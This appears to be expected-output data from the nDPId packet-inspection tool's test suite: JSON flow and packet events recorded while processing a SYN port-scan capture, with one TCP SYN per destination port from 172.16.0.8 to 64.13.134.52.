+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsaisAAC8Gr0esEAAIQA2GNIzTu9DdU4MZAAAAAGACEABsuwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsoicAADgGbkusEAAIQA2GNIzTB+TdU4MZAAAAAGACBAAsqAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs5qoAADYGK8isEAAIQA2GNIzTE9jdU4MZAAAAAGACDAAYtAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsswIAACsGanCsEAAIQA2GNIzTFGXdU4MZAAAAAGACEAAUJwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs+xQAACsGIl6sEAAIQA2GNIzTDpndU4MZAAAAAGACEAAZ8wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsrwkAAC8GammsEAAIQA2GNIzTDaXdU4MZAAAAAGACEAAa5wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAseJEAADcGmOGsEAAIQA2GNIzTD6bdU4MZAAAAAGACEAAY5gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAse3UAADsGkf2sEAAIQA2GNIzTzoXdU4MZAAAAAGACEABaBgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/eEAAC0GHZGsEAAIQA2GNIzTEyPdU4MZAAAAAGACCAAdaQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsro4AACgGceSsEAAIQA2GNIzSrdXdUoMYAAAAAGACBACGuQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsChEAACcGF2KsEAAIQA2GNIzSAAndUoMYAAAAAGACEAAohgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsd34AAC0Go\/SsEAAIQA2GNIzSBTDdUoMYAAAAAGACCAArXwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsoIAAADgGb\/KsEAAIQA2GNIzSBI7dUoMYAAAAAGACBAAwAQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsEIwAACsGDOesEAAIQA2GNIzSD6XdUoMYAAAAAGACEAAY6gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsTAEAADYGxnGsEAAIQA2GNIzSFqjdUoMYAAAAAGACDAAV5wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsnkwAAC0GfSasEAAIQA2GNIzSBBDdUoMYAAAAAGACCAAsfwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsFfcAACcGC3ysEAAIQA2GNIzSAGPdUoMYAAAAAGACEAAoLAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsSqoAACYG18isEAAIQA2GNIzSFUDdUoMYAAAAAGACDAAXTwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsviQAACgGYk6sEAAIQA2GNIzSatzdUoMYAAAAAGACBADJsgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsLroAACwG7bisEAAIQA2GNIzSEA\/dUoMYAAAAAGACBAAkgAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsCv8AAC4GD3SsEAAIQA2GNIzSTUTdUoMYAAAAAGACDADfSgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/JoAACYGJdisEAAIQA2GNIzSHnjdUoMYAAAAAGACDAAOFwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsnFAAAC4GfiKsEAAIQA2GNIzSBD\/dUoMYAAAAAGACDAAoUAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAs4+0AADUGL4WsEAAIQA2GNIzSBoLdUoMYAAAAAGACCAAqDQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058905,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058905,"pkt":"ACYLMQczACWzv5HuCABFAAAsav8AADsGonOsEAAIQA2GNIzTDuHdU4MZAAAAAGACEAAZqwAAAgQFtA=="} 